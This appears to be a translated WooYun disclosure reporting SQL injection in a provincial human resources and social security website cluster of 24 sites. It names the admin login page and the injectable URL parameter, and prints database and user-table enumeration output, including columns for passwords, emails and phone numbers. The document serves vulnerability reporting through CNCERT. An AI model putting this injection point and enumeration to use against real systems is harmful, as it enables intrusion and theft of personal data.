
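Vulnerability summary

Bug ID: wooyun-2015-097538

Title: Site cluster of a provincial Department of Human Resources and Social Security compromised, affecting 24 sites

Vendor: CNCERT

Author: BMa

Submitted: 2015-02-16 19:44

Fixed: 2015-04-02 19:46

Disclosed: 2015-04-02 19:46

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help, contact [email protected]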



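Vulnerability details

Disclosure status:

2015-02-16: Details reported to the vendor; awaiting vendor handling
2015-02-28: Vendor confirmed; details disclosed to the vendor only
2015-03-10: Details disclosed to core white hats and experts in related fields
2015-03-20: Details disclosed to regular white hats
2015-03-30: Details disclosed to intern white hats
2015-04-02: Details disclosed to the public

Brief description:

Site cluster of a provincial Department of Human Resources and Social Security compromised, affecting 24 sites

Detailed description:

Admin backend: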
http://www.snjrsj.gov.cn/hbwz/sms/login.jsp

[Screenshots: 0.jpg, 0.1.jpg, 0.2.jpg]


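Department Finance Division
Department Training Division
Department Wages Division
Department Arbitration Division
Department Human Resources and Social Security Supervision Division
Department Pension Insurance Division
Department Unemployment and Employment Division
Department Medical Insurance Division
Department Rural Insurance Division
Department Personnel Division
Department Party Office
Department Discipline Inspection and Supervision Office
Department Retired Cadres Division
Department Migrant Workers Division
Department Pension Insurance Bureau
Department Logistics Center
Department Employment Bureau
Department Teaching and Research Office
Department Information Center
Department Appraisal Center
Department Medical Insurance Center
Department Settlement Center
Railway Drivers' School
Overseas Office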


Injection point:
www.snjrsj.gov.cn/hbwzweb/html/hdjl/zxzx/zxzx_ckhf.shtml?zxlb=03
Parameter: zxlb

current user:    'HBWZ'
available databases [21]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] EXFSYS
[*] HBWZ
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB
Database: HBWZ
[68 tables]


Database: HBWZ
Table: CMS_SITEUSER
[2 columns]
+---------+--------+
| Column | Type |
+---------+--------+
| SITEID | NUMBER |
| USER_ID | NUMBER |
+---------+--------+
Database: HBWZ
Table: UAMS_USER
[14 columns]
+------------+----------+
| Column | Type |
+------------+----------+
| ADDRESS | VARCHAR2 |
| CREATETIME | VARCHAR2 |
| CREATEUSER | VARCHAR2 |
| DELETETIME | VARCHAR2 |
| EMAIL | VARCHAR2 |
| LOGINNAME | VARCHAR2 |
| MOBILE | VARCHAR2 |
| ORG_ID | VARCHAR2 |
| PASSWORD | VARCHAR2 |
| REALNAME | VARCHAR2 |
| STATUS | NUMBER |
| TEL | VARCHAR2 |
| USER_ID | NUMBER |
| USERTYPE | VARCHAR2 |
+------------+----------+
Database: HBWZ
Table: UAMS_USER
[20 entries]


Database: SYSTEM
[141 tables]


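Logging in as administrator admin:

[Screenshots: 1.jpg, 2.jpg]

Logging in as a regular user:

1. [Screenshot: pt1.jpg]
2. [Screenshot: pt2.jpg]

Proof of vulnerability:

Remediation:

Copyright notice: when reposting, credit the source BMa@WooYun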


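Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-02-28 16:44

Vendor reply:

CNVD confirmed and reproduced the vulnerability as described, and has passed it to CNCERT for dispatch to the Hubei branch center, which will follow up by coordinating with the organization that manages the website to handle it.

Latest status:

None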

